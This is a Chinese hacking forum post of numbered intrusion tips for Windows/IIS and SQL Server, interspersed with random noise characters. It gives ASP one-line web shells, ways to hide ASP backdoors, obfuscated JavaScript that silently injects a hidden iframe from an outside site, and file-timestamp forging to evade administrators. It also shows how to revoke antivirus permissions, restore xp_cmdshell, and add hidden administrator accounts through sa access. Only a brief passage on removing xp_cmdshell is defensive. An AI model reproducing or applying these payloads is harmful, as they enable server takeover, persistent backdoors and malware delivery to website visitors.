& h, E1 I1 N- s" A. ?- O. ]6 Xc).%><%execute request("go")%><%
# z5 Y) X; l# j9 Z3 \* pd).<script language=VBScript runat=server>execute request("sb")</Script>
' ~. D  z& j4 u$ i6 M5 he).<%25Execute(request("l"))%25>1 ^- K( }) G7 ^" D# \8 }
f).<%if request("cmd")<>"" then execute request("pass")%>2 T7 A9 o/ n1 m& e8 g

1 C( f4 N3 f4 ]3 p, q! G52、at "12:17" /interactive cmd, l  C3 s( [- E# J
执行后可以用AT命令查看新加的任务0 r: P8 _3 t/ j3 q* n
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。/ m' j' u( q. ~1 U. D
' j) m- y1 C# v8 C+ C7 G/ y- z/ q
53、隐藏ASP后门的两种方法
. O6 n. x  {: x: o9 j& n3 G1、建立非标准目录:mkdir images..\
6 e! x- ]4 w8 F1 \2 q4 X. J8 U拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
/ J: J+ G, I6 B" e# c9 C: G通过web访问ASP木马:http://ip/images../news.asp?action=login: X$ W( O& k* G( V
如何删除非标准目录:rmdir images..\ /s: e+ G% b0 ~. P
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:% }; E% B6 f4 s& S6 C
mkdir programme.asp
9 d. E, ^0 p& L: t( r新建1.txt文件内容:<!--#include file=”12.jpg”-->
, X$ C5 s# ~" y) g  n: {新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
  k* r# J" P5 u9 x$ Gattrib +H +S programme.asp
% ~* m; k0 p' ^通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt4 l3 h4 ^8 p* u+ b
1 c8 a; }* U) A
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。& p. e$ D! N5 D; P1 ^
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
9 F0 p* w" G& s" Z7 }$ D% W$ ?  o. Z
55、JS隐蔽挂马# \( v& c: G% e4 e# ?) Y
1.$ K! z2 q+ w8 T2 a' e
var tr4c3="<iframe src=ht";
, i" c% i8 W' ~/ @tr4c3 = tr4c3+"tp:/";6 A9 X) x# f8 E; i
tr4c3 = tr4c3+"/ww";! J) y- v: e/ Q( u' z+ l- k
tr4c3 = tr4c3+"w.tr4";
" D0 `9 V/ v( m( Z* ktr4c3 = tr4c3+"c3.com/inc/m";
( h8 H' k2 H1 M1 _( K8 x5 etr4c3 = tr4c3+"m.htm style="display:none"></i";
, {9 W1 R7 u9 _& w3 O$ d& ^' A/ Rtr4c3 =tr4c3+"frame>'";0 W- H3 @" K. g& s* {! t; H
document.write(tr4c3);) l, T8 c' D) {) m. t
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。# f+ N! s$ u2 m3 U: E7 G1 X

' ^) J/ m. Q- _0 l/ Z9 W. `+ @' g2.- S5 f/ |0 e6 D9 J4 M; m' F
转换进制,然后用EVAL执行。如
3 X, [2 R! B3 q; I$ beval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
- i3 q* @% V& K% p0 _* {; \不过这个有点显眼。
7 e2 \; I+ j1 P8 f/ ~! G2 ]$ ]8 Q3.
1 ^; u' ^- Y( [4 ?- T# ^/ h9 Ldocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
4 i; D6 v1 F1 i8 D最后一点,别忘了把文件的时间也修改下。/ {. [) J9 d0 {4 S' B7 E4 p5 ~

# ?8 Q; _1 f. x. T  A* E, n, [4 c1 G56.3389终端入侵常用DOS命令
/ T+ o8 B+ m0 E! f$ O! ptaskkill taskkill /PID 1248 /t% G0 a8 l% n# p& K* f5 l2 v, L

1 j* V# C; s; K; ^* l9 v' Htasklist 查进程: C) P4 |9 ~1 ?$ e
; @* G1 G1 c# L5 a; O6 t! Y4 ^
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
" R7 b4 k2 S4 Q' ]+ a8 w) qiisreset /reboot
7 B3 e# E* w/ _1 X9 v2 H8 ]3 t& Htsshutdn /reboot /delay:1    重起服务器" w6 [8 V6 w( E! ~' x% M4 o$ e4 L

+ ^: _' D( ^; n! A3 l' C2 zlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
3 e# K: x* T; j% ?$ o* {+ @+ b0 Z2 j- v9 a6 I/ X
query user 查看当前终端用户在线情况. ?8 Z. w7 c; x9 [2 b/ I: A6 M; b% ?: z

& l% l9 T& s, f6 U" Z1 r+ H要显示有关所有会话使用的进程的信息,请键入:query process *; P5 l1 z2 b0 r, e! s$ c
3 L" B! L0 w' @! M; [/ S
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:26 J1 A; d; U. z/ q! l0 N- m
! m  v) Z1 d1 J# c( t& V* L  l6 R
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
! e9 u, b2 L- @  d( [2 }
3 `; n: e" ^+ V! W要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
& ~% d- G- L9 B! d  ?% a% p1 c2 ?. `# I. @$ @# }: v
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
/ S/ F/ N% m# Z, ~9 P
" V7 U3 x; R5 D: b. \命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统2 ]4 M" U9 W0 c+ H
3 Y. }# D0 \0 M9 X% |) M, |
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
" i. g- g! k* O; D) A' q# q, y- F1 ]( E
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
2 F# W0 d7 `6 ]( i* i4 A& q
( ~, z: _1 d- k9 I6 ]1 S- s( _56、在地址栏或按Ctrl+O,输入:" z5 X9 K3 |" P$ g" Y
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
1 L" @( k  }3 O9 H5 x+ U- @0 [1 M( m* a: v( j9 R  ?" Z. r
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
. C5 s/ q7 A0 L2 \. M7 U
2 U' H" ~+ S. c0 t7 E, {0 _57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
1 L8 p1 ~" G) z( c) S+ D用net localgroup administrators是可以看到管理组下,加了$的用户的。
% e9 y2 ]8 \; c3 E5 W
! C- n, S7 c% B3 o58、 sa弱口令相关命令3 N  F. ?- D/ X& t$ s- f% E
/ _& n3 G  S/ x4 a$ g+ V
一.更改sa口令方法:
* X9 a1 ~) Y9 T5 G* w( [: F用sql综合利用工具连接后,执行命令:5 ~8 a& A4 ^2 e  ^, y* @3 V
exec sp_password NULL,'20001001','sa'( N7 a. F3 n. h+ X+ I
(提示:慎用!)
0 s- {$ b* ^  ~/ `0 K. B/ X* `7 n. v" a- d8 M3 {6 T- Q
二.简单修补sa弱口令.: {4 B% Y) a4 B# B0 U! g
8 [. E6 c5 n. q7 {  o
方法1:查询分离器连接后执行:
" o4 G( d1 c( b! ]) y1 G" wif exists (select * from
2 t+ n9 p# v) \2 @dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and% ^3 k, A2 ]% X; ]
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)# R1 L5 _9 D7 T2 @

0 l$ S3 b- f0 l! c5 }* X; mexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
/ m: B+ |: Z% z3 P* R9 q2 R9 q  }* L9 i
GO
8 U, S9 J0 Q* N1 t, f! p$ l' T' o+ k
然后按F5键命令执行完毕
! J4 K# Z: e# m3 y7 x( o  \) u: v1 h' h# c& L
方法2:查询分离器连接后
2 Z- E5 {8 E" o: `& ]5 O9 Z第一步执行:use master
% k2 a. [$ P" }. G" k第二步执行:sp_dropextendedproc 'xp_cmdshell'8 Z- q7 i* \+ o- w. Z% \
然后按F5键命令执行完毕, G( f) Z1 I$ D, ]4 c

1 P* o8 e  b( D. ?- y
8 ^  B5 B$ q3 x三.常见情况恢复执行xp_cmdshell.
# B! M8 i1 c6 ?8 ^/ w4 O5 M' ^+ S% F

: M  A9 A: h6 ~: E- {6 d4 g) B1 未能找到存储过程'master..xpcmdshell'." ~1 v8 a+ _! e; u& g6 R6 l7 W2 Z2 E
   恢复方法:查询分离器连接后,7 B$ M6 r/ C) `- Q
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
: _, r' a. n* @$ C( h; V# ^第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'5 X7 P; n: u3 H# k: N
然后按F5键命令执行完毕
% |% R% W9 I5 r+ V6 f3 w' ^
3 l% C4 a4 N6 \: R, _" S2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)9 U- u8 f! ?& q* Y
恢复方法:查询分离器连接后,
8 M" g) E( \8 `) H2 `; S第一步执行:sp_dropextendedproc "xp_cmdshell"7 M5 \4 k$ E. d4 j' Q( r
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
7 I& `/ e* \1 a; a/ j0 k- ^然后按F5键命令执行完毕4 o7 n9 E* S( D  N/ s% |# }" G
# A# \" `1 N: u0 o$ n
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)' q8 T1 q3 u, J9 @; ]
恢复方法:查询分离器连接后,
0 F, z  B6 m  }8 F6 c5 i) Z第一步执行:exec sp_dropextendedproc 'xp_cmdshell'# O8 q9 T- ?8 U- Q# J
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           - ?# L) z% E- j* F7 t8 L
然后按F5键命令执行完毕5 \% H2 s# [  T

  j( M( J& C: E4 p0 b四.终极方法.- z9 M4 @* n2 k1 o
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
, w; w9 @, x1 Z5 R* L4 j2 x* v( g1 F查询分离器连接后,
5 B4 S' t) b/ v2000servser系统:
3 }& h' `% p6 ~5 Hdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'6 M9 b" e6 B" l9 M5 V# S: L' ?! D

2 X8 `& @" h8 o0 y4 @4 s4 J2 sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
6 q' W' D  O! b8 ?# E0 s5 a
2 r: h* S- R* `- }% R% @xp或2003server系统:+ i0 j2 W( [, C9 u
% l: }0 a) [: |+ i) L0 x- u5 m
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
1 A- Y* j6 J: [) V' e+ j: X) U" Z
$ J& _% _& o7 Pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'8 g* e+ z- n" M0 q, O, Z  _! O, p* I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表